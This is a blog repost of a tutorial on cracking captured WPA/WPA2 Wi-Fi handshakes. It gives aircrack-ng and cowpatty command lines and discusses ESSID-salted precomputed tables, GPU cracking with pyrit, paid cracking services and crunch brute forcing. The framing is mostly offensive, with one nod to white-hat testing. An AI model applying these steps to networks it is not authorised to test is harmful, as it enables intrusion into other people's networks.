![GTA - SA All [PC] Game Missions Save Files, [Bonus Cheats]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji0bTCRrJKO41LWRud2OPlWVNp3YFMWW6fTKYPF50ctp5sYt5M_qcqbP-ihCtn25AvOb0qr9pH05ktq0577U2U-ZSL8Vn1H3IoEu3pp8-r6zegrO_W1R2SpOiUU4B7HMzx3cBU2Llq7Rc/w680/10h875f.jpg)
The Beginners Guide to Private Investigation
April 05, 2018
![The Ultimate Social Media Image Size Guide for 2018 [Infographic]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vLph7RjrkXRrXcsmUkh7YVMswuGfxrCe2jEnOyFzkSE-X4D4RBrV91RWyQPyhJfXE81Cot65lbMavmisWo_odIKO9xr6VrxCTSnfqQ5Tpkfojujq_sR6yRcJLLl6DlmxnphT9jgySMc8JCYhyzNTGQ=w680)
Tutorial - Cracking WPA/WPA2 (Part 2) - Any OS - Tools included
This is Part 2 of my guide on cracking WPA handshakes, I had to make it 2 parts as it was too long! You can find the first part here
Also this is a good summary of the methods available to us!
Also this is a good summary of the methods available to us!
Cracking
Now that you have your handshake you need to crack it. And this is a very popular subject in regards to wireless hacking as there are a few ways to go about it, all with varying opinions.
Dictionary attack
This is the standard method of cracking and is a very easy and simple method.
For this we use:
Code
aircrack-ng <filename-01.cap> -w <file path of wordlist>So for my example i would use:
Code
aircrack-ng WPA-01.cap -w Pass/ExampleFor my example i made a wordlist that consisted only of my wireless key, so the result was instant, however when doing this in the real world it will take you many hours or even days to run through a decent wordlist.
When using a live CD/USB stick to boot BT4 save your wordlist to your desktop and use
Code
-w <wordlist>However the problem with this method is that it will take a VERY long time to go through a word list of any decent size. In my example i was only going through 350 keys a second, that may seem fast but if you think that a 1GB word list would contain about 100 million words you can see that it would in fact take a very long time.
An alternative bit of software that has more features, including the usage of rainbow tables, but also uses this method but a tad faster is coWPAtty. It is included in Backtrack, so open it up and have a look at what it can do.
Here's some example syntax for cracking a 4way handshake.
Code
cowpatty -f <word list> -r <handshake>.cap -s <essid>"Rainbow" tables
Now this is an interesting method that a lot of people have misunderstood. Basically the idea is that if you had a rainbow table that had a list of words that had all been precomputed for a WPA handshake you can go through them a lot faster. Now this is true, you can go through rainbow table at say 40,000 keys a second compared to 350 keys a second in the prior example. However the WPA handshake has been salted with the ESSID of the network. THis means that a rainbow table that has been generated for "johns network" will not work for "Erics network" as the ESSID is different so there is a different salt on the handshake.
That means for every different ESSID a new rainbow table has to be produced to be used with it. It is like multiplication tables, everything has been worked out prior. Now this is where a few people get confused....
It is possible to create your own rainbow tables for networks with unique ESSID's however the rate at which you create them (the speed at which you precompute keys for the table) is exactly the same as the rate at which keys can be tested against a word list. So for me it was 350 keys a second being added to the table each second. You can then go through the word list at a very fast rate, i was able to go at 40,000 keys a second after i had generated the table. But the key point was that the time it took to generate the table could have been used to just go through the word list! So creating your own tables for unique ESSID's is just ridiculous!
However the idea about these tables is that someone with a large amount of computing power could generate tables for a list of popular ESSID's and then make the available for download. So the idea is that you capture a handshake from "WirelessHotspot" then check on the list of rainbow tables, you see that "WirelessHotspot" has a rainbow table, you download it and then you run through the word list at an accelerated rate. And believe it or not someone has done this!
in this thread you can see links to all of the tables for the most popular ESSID's if the network you are trying to crack has an ESSID in the list then you can download the table and run it through at great speed!
I will not cover the commands and screen shots of how to do this, as i have no need for this method, and there are no wireless networks with an ESSID in the list for me to crack; so you will just have to google it out for your self. It shouldn't be hard!
Accelerated word list with pyrit
Now this is the method that i believe is the best however it does require a decent graphics card! This method uses the power of your GPU (Graphics Processing Unit) in your graphics card to test a handshake against a word list at a very fast rate. This is the method i use as it makes the most sense to me, and i have a good graphics card! This method does still require a word list to work but it allows you to go through the word list A LOT faster than before. Here you can see that on my new system i am going at 5480 keys a second with the standard aircrack-ng dictionary attack:
Now when i use pyrit and my GPU i can get up to 56,000 keys a second!:
That makes a big difference!! Again i won't show you how to do all this as it is quite complex to set up and there are already a few guides out there. Look here for more info.
Online services
There are services online that use various techniques to crack WPA keys, although they do charge money! The best site is most likely to be www.recoverwpa.com as they do not charge an upfront deposit; you only pay if they find your key. However i do believe that this and a few other website are doing nothing more than what i would do, i do recall one website that charged $10 for <1 billion words in 2 hours, something i can do myself in 6 hours! So that option is there if you don't have the hardware or the time but do have the money! This is also a good test if you are a White hat, as it is possible that the blackhats would use a similar/same service.i recommend you google a round looking for the best service or maybe even ask me!
Bruteforcing
Now here is another method that is a tad ridiculous, basically what happens is that you pipe the out put of a program called crunch directly into a WPA cracker like aircrack-ng or pyrit. The idea is that it generates a wordlist as it cracks, and you can define the word list. so if you used:
Code
8 10 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!?-_With crunch and aricrack-ng you would be generating a list of all of the 8 to 10 character combinations of those characters. Me and a friend worked this out to be something like 84 Petabytes! And as you can imagine, not only is that impractical it would take an impossible amount of time to crack, even with a high end setup.
The only legitimate use for crunch and WPA cracking that i can see is that if you know that the wireless key is only numeric or you know that it is a certain length and contains certain characters that way you can cut down massively on the amount of words generated. So for example 0-9 for 8 letters long may only take a day to do, and that is very plausible, but only if you know that it is only 8 letters long and only numeric.
Statscount
Trending Posts
Counter-Strike Global Offensive Guide: Tips For Beginners
September 14, 2017
The Beginners Guide to Private Investigation
April 05, 2018
Cyber harassment helpline goes live in Pakistan
February 08, 2019
Subscribe Us
Total Pageviews
Search
Posts
Categories
Contact Form
Created By eaadhar |
0 Comments